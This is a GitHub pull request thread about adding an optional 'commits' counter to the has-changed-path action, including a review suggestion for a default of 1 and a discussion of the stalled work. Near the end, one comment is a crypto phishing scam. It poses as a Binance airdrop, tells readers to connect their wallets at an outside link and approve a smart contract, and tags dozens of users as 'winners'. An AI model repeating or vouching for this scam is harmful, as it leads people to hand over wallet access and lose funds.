### PR TITLE
Add optional `commits` counter

### LINKED ISSUE #34: Github warning: `set-output` command is deprecated
```
Warning: The `set-output` command is deprecated and will be disabled soon.
Please upgrade to using Environment Files. 
For more information see: https://github.blog/changelog/2022-10-11-github-actions-deprecating-save-state-and-set-output-commands/
```

### PR DESCRIPTION
**Pull request by boozook**
Also updated dependencies.
Closes #34.

### CODE REVIEW

File: src/hasChanged.js [hunk 1]
```diff
@@ -16,14 +16,14 @@ function getCWD() {
   return `${GITHUB_WORKSPACE}/${SOURCE}`
 }
 
-async function hasChanged(pathsToSearch) {
+async function hasChanged(pathsToSearch, commits) {
```
Comment (MarceloPrado) [inline src/hasChanged.js]: we need to add a fallback to `1` to keep backward compatibility

Comment (RobinTail) [reply src/hasChanged.js]:
```suggestion
async function hasChanged(pathsToSearch, commits = 1) {
```
@boozook

**Comment by RobinTail** [comment]
Any plans on finishing this and resolving #34 , @MarceloPrado  || @boozook ?

**Comment by RobinTail** [comment]
@MarceloPrado

**Comment by boozook** [comment]
Sorry, unfortunately I have no time as well as forces to resolve conflicts and make improvements to this PR.
If anyone could take it, just copy, rebase and do not forget to [add a fallback to 1 to keep backward compatibility][link], that will be awesome.

@RobinTail || @koniuszy 🙄


[link]: https://github.com/MarceloPrado/has-changed-path/pull/35#discussion_r1084251758

**Comment by developomp** [comment]
@MarceloPrado do you have time to review and merge PRs? Because I'm planning to open one that resolves all the merge conflict of this PR.

**Comment by Chris53897** [comment]
@developomp I think this PR is doing to much for a PR.
It would be great if you can open a PR that just solves the deprecation.
https://github.com/MarceloPrado/has-changed-path/issues/34

Other changes should be done in sperated PRs in my point of view.

**Comment by Chris53897** [comment]
After having a look at master and the the [github action runs](https://github.com/MarceloPrado/has-changed-path/actions/runs/3948949745), i guess this is already fixed.

**Comment by developomp** [comment]
Can this PR be closed then?

**Comment by Chris53897** [comment]
The work from https://github.com/MarceloPrado/has-changed-path/pull/35#issuecomment-1669794258 still needs to be done. I guess the best solution is to create a new PR with just the changes for the function `Add optional commits counter`. I do not need this function, and the author has no time to finish it. If you want this function, it's probably up to you to create a PR.

**Comment by tim-tepia** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[Claim Now](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1500 in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @gaojice, @okunevfilipp, @2foil, @jasonzhouu, @iamdivisionbyzero, @CasperW04, @kkiyama117, @evansamudro, @ld909, @Klongrich, @duckha, @Augohan, @beeeku, @indahud, @akirawuc, @bhzhu203, @simeononsecurity, @gggal, @Imaclean74, @GhostWalkers, @shengchl, @cientovolando, @IllIYAAAllI, @agryaznov, @bronsonwagner, @alt0xFF, @jxuanli, @BouweCeunen, @SieR-VR, @Nanue1, @smitea, @outlawalpha5, @emg110, @kisasexypantera94, @NexusNeuralNet, @acumenix, @andrewhayter, @adityasaxena, @sn0vvdr3am, @serinuntius, @tsmbl, @BelugaCat01, @ernestwisniewski, @jdkanani, @jimcal, @Shankhara, @dev-alexandre-lopes, @louissalerno, @waylennn, @Draco-x3

**Pull request closed without merging**